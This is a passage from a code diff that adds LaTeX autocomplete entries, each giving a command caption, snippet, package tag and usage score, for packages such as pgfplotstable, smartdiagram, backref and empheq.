'\\titlecontents{$1}[$2]{$3}{$4}{$5}{$6}[$7]', + meta: 'titletoc-cmd', + score: 0.0017036290423289926, + }, + { + caption: '\\titlecontents{}[]{}{}{}{}', + snippet: '\\titlecontents{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'titletoc-cmd', + score: 0.0017036290423289926, + }, + { + caption: '\\numberline{}', + snippet: '\\numberline{$1}', + meta: 'titletoc-cmd', + score: 0.007461440567272885, 
+ }, + { + caption: '\\dottedcontents{}[]{}{}{}', + snippet: '\\dottedcontents{$1}[$2]{$3}{$4}{$5}', + meta: 'titletoc-cmd', + score: 4.743909531747666e-5, + }, + { + caption: '\\filcenter', + snippet: '\\filcenter', + meta: 'titletoc-cmd', + score: 0.0004835660211260246, + }, + { + caption: '\\thecontentslabel', + snippet: '\\thecontentslabel', + meta: 'titletoc-cmd', + score: 0.0010521864830662522, + }, + { + caption: '\\contentsuse{}{}', + snippet: '\\contentsuse{$1}{$2}', + meta: 'titletoc-cmd', + score: 6.110202388233705e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'titletoc-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\contentspage', + snippet: '\\contentspage', + meta: 'titletoc-cmd', + score: 0.0004955116569277163, + }, + { + caption: '\\contentslabel[]{}', + snippet: '\\contentslabel[$1]{$2}', + meta: 'titletoc-cmd', + score: 0.0011055859582683105, + }, + { + caption: '\\contentslabel{}', + snippet: '\\contentslabel{$1}', + meta: 'titletoc-cmd', + score: 0.0011055859582683105, + }, + { + caption: '\\contentsmargin{}', + snippet: '\\contentsmargin{$1}', + meta: 'titletoc-cmd', + score: 0.00013423526504458629, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'titletoc-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\titlerule', + snippet: '\\titlerule', + meta: 'titletoc-cmd', + score: 0.019273712561461216, + }, + { + caption: '\\titlerule[]{}', + snippet: '\\titlerule[$1]{$2}', + meta: 'titletoc-cmd', + score: 0.019273712561461216, + }, + ], + dblfloatfix: [ + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'dblfloatfix-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'dblfloatfix-cmd', + score: 0.354445763583904, + }, + { + caption: '\\textsubscript{}', + snippet: '\\textsubscript{$1}', + meta: 'dblfloatfix-cmd', + score: 0.058405875394131175, + }, + { + caption: '\\em', + snippet: '\\em', + meta: 'dblfloatfix-cmd', + score: 0.10357353994640862, + }, + ], + pgfplotstable: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplotstable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfplotstable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'pgfplotstable-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'pgfplotstable-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'pgfplotstable-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'pgfplotstable-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplotstable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 
'pgfplotstable-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfplotstable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfplotstable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfplotstable-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfplotstable-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfplotstable-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfplotstable-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfplotstable-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplotstable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfplotstable-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfplotstable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfplotstable-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfplotstable-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfplotstable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfplotstable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfplotstable-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfplotstable-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfplotstable-cmd', + score: 0.0008147200475678891, + }, + { + caption: 
'\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplotstable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfplotstable-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfplotstable-cmd', + score: 0.2864294797053033, + }, + ], + acronym: [ + { + caption: '\\acp{}', + snippet: '\\acp{$1}', + meta: 'acronym-cmd', + score: 0.0005185177930914685, + }, + { + caption: '\\acsfont{}', + snippet: '\\acsfont{$1}', + meta: 'acronym-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\aclabelfont', + snippet: '\\aclabelfont', + meta: 'acronym-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\acro{}{}', + snippet: '\\acro{$1}{$2}', + meta: 'acronym-cmd', + score: 0.023587207425038587, + }, + { + caption: '\\acl{}', + snippet: '\\acl{$1}', + meta: 'acronym-cmd', + score: 0.0008131607751426444, + }, + { + caption: '\\acf{}', + snippet: '\\acf{$1}', + meta: 'acronym-cmd', + score: 0.0006845634165950408, + }, + { + caption: '\\acrodef{}[]{}', + snippet: '\\acrodef{$1}[$2]{$3}', + meta: 'acronym-cmd', + score: 0.0002902047200830372, + }, + { + caption: '\\acs{}', + snippet: '\\acs{$1}', + meta: 'acronym-cmd', + score: 0.002351209826598939, + }, + { + caption: '\\acfp{}', + snippet: '\\acfp{$1}', + meta: 'acronym-cmd', + score: 2.2013599341265054e-5, + }, + { + caption: '\\ac{}', + snippet: '\\ac{$1}', + meta: 'acronym-cmd', + score: 0.04714113215364704, + }, + { + caption: '\\let', + snippet: '\\let', + meta: 'acronym-cmd', + score: 0.03789745970461662, + }, + ], + nicefrac: [ + { + caption: '\\nicefrac{}{}', + snippet: '\\nicefrac{$1}{$2}', + meta: 'nicefrac-cmd', + score: 0.0018011350423659288, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'nicefrac-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'nicefrac-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'nicefrac-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'nicefrac-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'nicefrac-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'nicefrac-cmd', + score: 0.0018957469739775527, + }, + ], + smartdiagram: [ + { + caption: '\\usesmartdiagramlibrary{}', + snippet: '\\usesmartdiagramlibrary{$1}', + meta: 'smartdiagram-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'smartdiagram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'smartdiagram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'smartdiagram-cmd', + score: 
0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'smartdiagram-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'smartdiagram-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'smartdiagram-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'smartdiagram-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'smartdiagram-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'smartdiagram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'smartdiagram-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'smartdiagram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'smartdiagram-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'smartdiagram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'smartdiagram-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'smartdiagram-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'smartdiagram-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'smartdiagram-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'smartdiagram-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'smartdiagram-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'smartdiagram-cmd', + score: 
0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'smartdiagram-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'smartdiagram-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'smartdiagram-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'smartdiagram-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'smartdiagram-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'smartdiagram-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'smartdiagram-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'smartdiagram-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'smartdiagram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'smartdiagram-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'smartdiagram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'smartdiagram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'smartdiagram-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'smartdiagram-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'smartdiagram-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'smartdiagram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 
'smartdiagram-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'smartdiagram-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'smartdiagram-cmd', + score: 0.2864294797053033, + }, + ], + qtree: [ + { + caption: '\\qroof{}', + snippet: '\\qroof{$1}', + meta: 'qtree-cmd', + score: 0.00012663929287995903, + }, + { + caption: '\\Tree[]', + snippet: '\\Tree[$1]', + meta: 'qtree-cmd', + score: 0.0008894716589418522, + }, + { + caption: '\\Tree', + snippet: '\\Tree', + meta: 'qtree-cmd', + score: 0.0008894716589418522, + }, + ], + backref: [ + { + caption: '\\backrefpagesname', + snippet: '\\backrefpagesname', + meta: 'backref-cmd', + score: 0.0022756001200686213, + }, + { + caption: '\\backref', + snippet: '\\backref', + meta: 'backref-cmd', + score: 0.0025820187198826706, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'backref-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\global', + snippet: '\\global', + meta: 'backref-cmd', + score: 0.006609629561859019, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'backref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'backref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'backref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'backref-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'backref-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'backref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'backref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'backref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'backref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'backref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'backref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'backref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'backref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\makeindex', + snippet: '\\makeindex', + meta: 'backref-cmd', + score: 0.010304996748556729, + }, + { + caption: '\\index{}', + snippet: '\\index{$1}', + meta: 'backref-cmd', + score: 0.013774721817648336, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'backref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'backref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'backref-cmd', + score: 0.008565354665444157, + }, + ], + epigraph: [ + { + caption: '\\epigraphflush{}', + snippet: '\\epigraphflush{$1}', + meta: 'epigraph-cmd', + score: 1.8073688234300064e-5, + }, + { + caption: '\\epigraphsize{}', + snippet: '\\epigraphsize{$1}', + meta: 'epigraph-cmd', + score: 6.820709322498027e-5, + }, + { + caption: '\\epigraphsize', + snippet: '\\epigraphsize', + meta: 'epigraph-cmd', + score: 6.820709322498027e-5, + }, + { + caption: '\\epigraph{}{}', + 
snippet: '\\epigraph{$1}{$2}', + meta: 'epigraph-cmd', + score: 0.0031428856022970054, + }, + ], + chngcntr: [ + { + caption: '\\counterwithin{}{}', + snippet: '\\counterwithin{$1}{$2}', + meta: 'chngcntr-cmd', + score: 0.001287401394784382, + }, + { + caption: '\\counterwithout{}{}', + snippet: '\\counterwithout{$1}{$2}', + meta: 'chngcntr-cmd', + score: 0.0026127666246546326, + }, + ], + empheq: [ + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'empheq-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'empheq-cmd', + score: 1.897791904799601, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'empheq-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'empheq-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'empheq-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'empheq-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'empheq-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'empheq-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'empheq-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'empheq-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'empheq-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'empheq-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'empheq-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'empheq-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'empheq-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'empheq-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'empheq-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'empheq-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'empheq-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'empheq-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'empheq-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'empheq-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'empheq-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'empheq-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'empheq-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'empheq-cmd', + score: 0.0028650540724050534, + 
}, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'empheq-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'empheq-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'empheq-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'empheq-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'empheq-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'empheq-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'empheq-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'empheq-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'empheq-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'empheq-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'empheq-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'empheq-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'empheq-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'empheq-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'empheq-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'empheq-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'empheq-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'empheq-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'empheq-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'empheq-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'empheq-cmd', + score: 0.0015607282046545064, + }, + { + caption: 